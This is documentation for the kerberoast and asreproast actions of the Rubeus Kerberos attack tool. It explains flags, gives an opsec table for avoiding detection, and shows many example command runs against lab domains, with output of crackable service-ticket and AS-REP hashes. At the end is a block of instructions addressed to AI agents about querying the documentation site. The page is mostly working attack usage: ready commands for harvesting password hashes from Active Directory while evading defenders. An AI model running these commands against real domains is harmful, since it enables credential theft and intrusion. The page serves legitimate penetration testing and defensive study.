# Roasting Breakdown of the roasting commands: | Command | Description | | ---------- | -------------------------------------------------------- | | kerberoast | Perform Kerberoasting against all (or specified) users | | asreproast | Perform AS-REP roasting against all (or specified) users | ### kerberoast The **kerberoast** action replaces the [SharpRoast](https://github.com/GhostPack/SharpRoast) project's functionality. Like SharpRoast, this action uses the `KerberosRequestorSecurityToken.GetRequest Method()`() method that was contributed to PowerView by [@machosec](https://twitter.com/machosec) in order to request the proper service ticket (for default behavior, opsec table for more detail). Unlike SharpRoast, this action now performs proper ASN.1 parsing of the result structures. With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, *requesting their highest supported encryption type* (see the opsec table). The `/spn:X` argument roasts just the specified SPN, the `/user:X` argument roasts just the specified user, and the `/ou:X` argument roasts just users in the specific OU. The `/domain` and `/dc` arguments are optional, pulling system defaults as other actions do. The `/stats` flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options. The `/outfile:FILE` argument outputs roasted hashes to the specified file, one per line. If the `/simple` flag is specified, roasted hashes will be output to the console, one per line. If the `/nowrap` flag is specified, Kerberoast results will not be line-wrapped. If the the TGT `/ticket:X` supplied (base64 encoding of a .kirbi file or the path to a .kirbi file on disk) that TGT is used to request the service service tickets during roasting. If `/ticket:X` is used with `/spn:Y` or `/spns:Y` (`/spns:` can be a file containing each SPN on a new line or a comma-separated list) then no LDAP searching happens for users, so it can be done from a non-domain joined system in conjunction with `/dc:Z`. If the `/tgtdeleg` flag is supplied, the tgtdeleg trick it used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in **msDS-SupportedEncryptionTypes** will have RC4 tickets requested. If the `/aes` flag is supplied, accounts with AES encryption enabled in **msDS-SupportedEncryptionTypes** are enumerated and AES service tickets are requested. If the `/ldapfilter:X` argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users. If the `/rc4opsec` flag is specified, the **tgtdeleg** trick is used, and accounts **without** AES enabled are enumerated and roasted. If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with `/creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD`. If the `/pwdsetafter:MM-dd-yyyy` argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted. If the `/pwdsetbefore:MM-dd-yyyy` argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted. If the `/resultlimit:NUMBER` argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER. If the `/delay:MILLISECONDS` argument is specified, that number of milliseconds is paused between TGS requests. The `/jitter:1-100` flag can be combined for a % jitter. If the `/enterprise` flag is used, the spn is assumed to be an enterprise principal (i.e. **). This flag only works when kerberoasting with a TGT. If the `/autoenterprise` flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will automatically retry using the enterprise principal. This is only useful when `/spn` or `/spns` is *not* supplied as Rubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account information. #### kerberoasting opsec Here is a table comparing the behavior of various flags from an opsec perspective: | Arguments | Description | | ------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | **none** | Use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption | | **/tgtdeleg** | Use the **tgtdeleg** trick to perform TGS-REQ requests of RC4-enabled accounts, roast all accounts w/ RC4 specified | | **/ticket:X** | Use the supplied TGT blob/file for TGS-REQ requests, roast all accounts w/ RC4 specified | | **/rc4opsec** | Use the **tgtdeleg** trick, enumerate accounts *without* AES enabled, roast w/ RC4 specified | | **/aes** | Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption | | **/aes /tgtdeleg** | Use the **tgtdeleg** trick, enumerate accounts with AES enabled, roast w/ AES specified | | **/pwdsetafter:X** | Use the supplied date and only enumerate accounts with password last changed after that date | | **/pwdsetbefore:X** | Use the supplied date and only enumerate accounts with password last changed before that date | | **/resultlimit:X** | Use the specified number to limit the accounts that will be roasted | #### Examples Kerberoasting all users in the current domain using the default `KerberosRequestorSecurityToken.GetRequest` method: ``` C:\Rubeus>Rubeus.exe kerberoast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: Kerberoasting [*] SamAccountName : harmj0y [*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local [*] ServicePrincipalName : asdf/asdfasdf [*] Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)... [*] SamAccountName : sqlservice [*] DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local [*] ServicePrincipalName : MSSQLSvc/SQL.testlab.local [*] Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)... ...(snip)... ``` Kerberoasting all users in a specific OU, saving the hashes to an output file: ``` C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: Kerberoasting [*] Target OU : OU=TestingOU,DC=testlab,DC=local [*] SamAccountName : testuser2 [*] DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local [*] ServicePrincipalName : service/host [*] Hash written to C:\Temp\hashes.txt [*] Roasted hashes written to : C:\Temp\hashes.txt ``` Perform Kerberoasting using the `tgtdeleg` trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets: ``` C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3 ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] Using 'tgtdeleg' to request a TGT for the current user [*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else [*] Searching the current domain for Kerberoastable users [*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010 [*] Up to 3 result(s) will be returned [*] Total kerberoastable users : 3 [*] SamAccountName : harmj0y [*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local [*] ServicePrincipalName : testspn/server [*] PwdLastSet : 5/31/2008 12:00:02 AM [*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 [*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)... [*] SamAccountName : constraineduser [*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local [*] ServicePrincipalName : blah/blah123 [*] PwdLastSet : 9/5/2009 7:48:50 PM [*] Supported ETypes : RC4_HMAC [*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)... [*] SamAccountName : newuser [*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local [*] ServicePrincipalName : blah/blah123456 [*] PwdLastSet : 9/12/2008 8:05:16 PM [*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 [*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)... ``` List statistics about found Kerberoastable accounts without actually sending ticket requests: ``` C:\Rubeus>Rubeus.exe kerberoast /stats ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] Listing statistics about target users, no ticket requests being performed. [*] Searching the current domain for Kerberoastable users [*] Total kerberoastable users : 4 ---------------------------------------------------------------------- | Supported Encryption Type | Count | ---------------------------------------------------------------------- | RC4_HMAC_DEFAULT | 1 | | RC4_HMAC | 1 | | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 | | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 | ---------------------------------------------------------------------- ---------------------------------- | Password Last Set Year | Count | ---------------------------------- | 2019 | 4 | ---------------------------------- ``` Kerberoasting a specific user, with simplified hash output: ``` C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target User : harmj0y [*] Searching the current domain for Kerberoastable users [*] Total kerberoastable users : 1 $krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)... ``` Kerberoasting all users in a foreign *trusting* domain, not line-wrapping the results: ``` C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] Target Domain : dev.testlab.local [*] SamAccountName : jason [*] DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local [*] ServicePrincipalName : test/test [*] Hash : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)... ``` Kerberoasting using an existing TGT: ``` C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.5 [*] Action: Kerberoasting [*] Using a TGT /ticket to request service tickets [*] Target SPN : asdf/asdfasdf [*] Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)... ``` "Opsec" Kerberoasting, using the **tgtdeleg** trick, filtering out AES-enabled accounts: ``` C:\Rubeus>Rubeus.exe kerberoast /rc4opsec ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.6 [*] Action: Kerberoasting [*] Using 'tgtdeleg' to request a TGT for the current user [*] Searching the current domain for Kerberoastable users [*] Searching for accounts that only support RC4_HMAC, no AES [*] Found 6 users to Kerberoast! [*] SamAccountName : harmj0y [*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local [*] ServicePrincipalName : asdf/asdfasdf [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)... ``` ### asreproast The **asreproast** action replaces the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast/) project which executed similar actions with the (larger sized) [BouncyCastle](https://www.bouncycastle.org/) library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, [see this post](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/). Just as with the [kerberoast](broken://pages/-MYMTQUCNlnw0EMy9tNq#kerberoast) command, if no other arguments are supplied, all user accounts not requiring with Kerberos preauth not required are roasted. The `/user:X` argument roasts just the specified user, and the `/ou:X` argument roasts just users in the specific OU. The `/domain` and `/dc` arguments are optional, pulling system defaults as other actions do. The `/outfile:FILE` argument outputs roasted hashes to the specified file, one per line. Also, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with `/creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD`. The output `/format:X` defaults to John the Ripper ([Jumbo version](https://github.com/magnumripper/JohnTheRipper)). `/format:hashcat` is also an option for the new hashcat mode 18200. AS-REP roasting all users in the current domain: ``` C:\Rubeus>Rubeus.exe asreproast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: AS-REP roasting [*] Target Domain : testlab.local [*] SamAccountName : dfm.a [*] DistinguishedName : CN=dfm.a,CN=Users,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a' [*] Connecting to 192.168.52.100:88 [*] Sent 163 bytes [*] Received 1537 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)... [*] SamAccountName : TestOU3user [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' [*] Connecting to 192.168.52.100:88 [*] Sent 169 bytes [*] Received 1437 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip).. [*] SamAccountName : harmj0y2 [*] DistinguishedName : CN=harmj0y2,CN=Users,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2' [*] Connecting to 192.168.52.100:88 [*] Sent 166 bytes [*] Received 1407 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip).. ``` AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format: ``` C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: AS-REP roasting [*] Target OU : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local [*] Target Domain : testlab.local [*] SamAccountName : TestOU3user [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' [*] Connecting to 192.168.52.100:88 [*] Sent 169 bytes [*] Received 1437 bytes [+] AS-REQ w/o preauth successful! [*] Hash written to C:\Temp\hashes.txt [*] Roasted hashes written to : C:\Temp\hashes.txt ``` AS-REP roasting a specific user: ``` C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: AS-REP roasting [*] Target User : TestOU3user [*] Target Domain : testlab.local [*] SamAccountName : TestOU3user [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' [*] Connecting to 192.168.52.100:88 [*] Sent 169 bytes [*] Received 1437 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... ``` AS-REP roasting all users in a foreign *trusting* domain: ``` C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: AS-REP roasting [*] Target Domain : dev.testlab.local [*] SamAccountName : devuser3 [*] DistinguishedName : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local [*] Using domain controller: dev.testlab.local (192.168.52.105) [*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3' [*] Connecting to 192.168.52.105:88 [*] Sent 175 bytes [*] Received 1448 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)... ``` AS-REP roasting users in a foreign non-trusting domain using alternate credentials: ``` C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!" ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.3.4 [*] Action: AS-REP roasting [*] Target Domain : external.local [*] Using alternate creds : EXTERNAL.local\administrator [*] SamAccountName : david [*] DistinguishedName : CN=david,CN=Users,DC=external,DC=local [*] Using domain controller: external.local (192.168.52.95) [*] Building AS-REQ (w/o preauth) for: 'external.local\david' [*] Connecting to 192.168.52.95:88 [*] Sent 165 bytes [*] Received 1376 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)... ``` ## --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://specterops.gitbook.io/ghostpack/rubeus/roasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.